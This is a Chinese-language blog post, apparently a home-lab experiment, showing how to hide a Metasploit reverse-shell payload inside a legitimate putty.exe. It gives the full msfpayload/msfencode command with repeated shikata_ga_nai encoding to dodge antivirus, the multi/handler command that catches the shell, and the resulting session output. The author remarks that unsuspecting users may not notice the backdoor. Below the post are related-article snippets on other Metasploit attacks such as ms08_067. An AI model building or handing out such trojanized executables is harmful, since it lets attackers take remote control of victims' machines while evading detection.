metasploit隐秘地启动一个攻击载荷

最新推荐文章于 2022-04-27 13:49:21 发布
最新推荐文章于 2022-04-27 13:49:21 发布
阅读量4.5k 收藏
点赞数 1
分类专栏: backtrack metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/8871030
版权

在网上下载putty.exe,上传到bt5,然后复制到/opt/metasploit/msf3/work目录

root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -t exe -x work/putty.exe -o putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)


real    0m42.531s
user    0m25.086s
sys     0m16.381s
root@bt:/opt/metasploit/msf3#

上传到XP,还是报威胁。



我关掉杀毒软件,然后双击putty_backdoor.exe,看看:



弹出这个,但是很快就没了,出现了一两秒的样子。

这时,当我在BT5运行msfcli时,它就一直显示,不会一闪而过:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E
[*] Please wait while we load the module tree...

                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##



       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

PAYLOAD => windows/shell_reverse_tcp
LHOST => 192.168.1.11
LPORT => 31337
[*] Started reverse handler on 192.168.1.11:31337 
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1136) at 2013-04-28 06:13:58 -0400

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\1>

运行msfcli后,出现 

[*] Starting the payload handler...

时,就双击putty_backdoor.exe,这时,那上面的图片所显示的登录的界面,就一直停留着了,不会像刚才那样,一闪而过了。

而且,它也有putty.exe的功能,能正常登录,如下图:




但是,当我在bt5退出时:

C:\1>exit
exit

[*] Command shell session 1 closed.  Reason: Died from Errno::ECONNRESET

root@bt:~#

XP上的登录界面(如上图所示)也没有了。


这时,不明真相的人,可能并不会在意。不过,如果多试几次,可能会看出点问题来。


现在的问题是,这个exe惊动了杀毒软件,没有躲过杀毒软件。


feier7501
关注
专栏目录
Metasploit渗透测试实验报告
ling_xiao007的专栏
02-21 1万+
Metasploit渗透测试魔鬼训练营》一书采用独特的让读者成为虚拟渗透测试的主角的方式,经历一次对DVSSC公司网络的渗透测试任务。渗透测试的目标为DVSSC公司DMZ网段以及内网客户端主机。四个主机均存在严重漏洞缺陷,可执行不同方式的攻击方式。 信息搜集阶段获得了dvscc的域名注册信息、地理位置,以及DMZ网段操作系统版本、开放端口及其服务版本等信息,但域名注册信息存有疑问。 漏洞扫描阶段获得DMZ网段主机大量漏洞信息,可采取不同方式的攻击方式,如口令猜测、网络服务渗透攻击、浏览器渗
你的手机曾经被监控过吗?
ailx10
08-07 1305
生活中,经常有人说自己手机被监控了,微信聊天记录被监控了,手机摄像头被打开了。今天我做了一个简单的测试,验证了安卓9会被监控,安卓11不会被监控,腾讯手机管家可以成功查杀到木马病毒,因此,针对手机被监控的知友们,不要下载色情APP,买好一点的手机,并且安装杀毒软件,安装新软件之后,立马进行病毒检测。第一步:黑客或骗子团伙会准备好一个木马病毒,比如色情APP第二步:黑客或骗子团伙,会在公网上配置好监...
渗透测试靶机实战---系统篇02
一杯咖啡的渗透记忆
10-12 2132
(续)渗透测试靶机实战---01 3.OS End Of Life Detection (系统寿命终止漏洞) root@kali:~# telnet 192.168.10.149 Trying 192.168.10.149... Connected to 192.168.10.149. Escape character is '^]'. _ ...
Command shell session 2 closed
幽幽云海
05-18 4695
问题描述: 生成一个 xxx.deb 反弹shell客户端, 在客户端安装xxx.deb之后,反弹shell显示已经建立session但是随即就close。 查了一会,查看 show options 时,发现 payload 忘记配置: 重新配置payload 再次连接测试 OK 正常建立连接 ...
内网实验1:getshell、上线提权、抓取主机密码
soldi_er的博客
05-11 3096
文章目录概述实验1:phpmyadmin弱口令+写木马 概述   实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。   环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。 宿主机:192.168.43.56 Kali攻击机:192.168.43.57 Win7外网服务器:192.168.43.100 实验1:phpmyadmin弱口令+写木马   Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。   phpMyAdmin
kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
sievr的博客
02-13 1万+
一、漏洞说明 2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。 目前,9月7日EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试已经可以远程代码执行。 二、影响版本 Windows 7 Windows...
Metasploit后渗透攻击与防范
Metasploit是一款开源的渗透测试框架,提供了许多渗透测试工具和资源,其中后渗透攻击是其重要组成部分之一。 后渗透攻击是指在目标系统中成功获取初始访问权限后,利用各种手段持久地控制目标系统或者进一步深入...
Metasploit渗透测试之制作隐藏后门:利用无线网络实施攻击
# 1. Metasploit渗透测试简介 ## 1.1 Metasploit简介 Metasploit是一款开放源代码的渗透测试工具,由rapid7公司...渗透测试(Penetration Testing)是一种模拟黑客攻击的安全评估方法,通过模拟攻击来发现系统中存在
Metasploit:渗透测试中的主动信息收集技术
Metasploit一个开源的渗透测试框架,旨在帮助安全研究人员和渗透测试人员有效地发现、利用和验证系统中的安全漏洞。它提供了一系列的工具和资源,包括漏洞利用工具、Payload生成器、渗透测试工具等,帮助用户对...
Metasploit的高级漏洞利用与0day
Moore在2003年创建,最初是作为一个开源项目进行开发和维护。随着时间推移,Metasploit不断发展壮大,并由Rapid7公司进行了收购。目前,Metasploit已经成为渗透测试领域最受欢迎和广泛使用的工具之一。 ## 1.3 ...
Metasploit 快速入门(三)—— 服务端漏洞利用
gclome的博客
07-22 2612
今天的这篇文章是对Metasploit 快速入门(三)—— 服务端漏洞利用这篇文章的复现。有些地方由于环境配不好,就直接把原文的图copy过来了! 温馨提示:靶机用自己的虚拟机就好,如果不想搞坏你的虚拟机,记得加快照、加快照、快照 原创:合天网安实验室合天智汇 在前面,我们学习了 Metasploit快速入门(一) Metasploit快速入门(二) Metasploit 快速入门(二)——信息收集和扫描-续 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型
【渗透测试笔记】之【MSF 信息搜集】
AA8j的博客
11-11 1414
Nmap msf5 > db_nmap -sV 192.168.172.130 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST [*] Nmap: Nmap scan report for 192.168.172.130 [*] Nmap: Host is up (0.0011s latency). [*] Nmap: Not shown: 997 closed ports [*] Nmap: POR
渗透测试学习笔记之案例一
Fly_鹏程万里
07-06 5196
0x00 前言很久没有更新博客了,主要是因为工作很忙,写博客也太耗时间了。但是突然发现,许久不写很多东西都快生疏了。因而决定从今天起开始写一些跟渗透测试相关的文章,也可以认为是学习笔记吧,留作日后的技术积累和参考吧。0x01 案列分析实验环境:目标靶机:10.11.1.0/24攻击机:Kali Linux (10.11.0.79)信息收集:扫描存在smb服务的主机:# nmap -A -p 139...
cs传shell给msf显示Meterpreter session x is not valid and will be closed
内心不种满鲜花就会长满杂草
04-27 4635
今天在公司做实验,cs和msf都安装在阿里云的vps上。当我把cs的shell传给msf的时候一直显示如下“ Meterpreter session 2 is not valid and will be closed Meterpreter session 2 closed
metasploit将命令行shell升级为meterpreter
天元喜羊羊的博客
04-28 8058
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值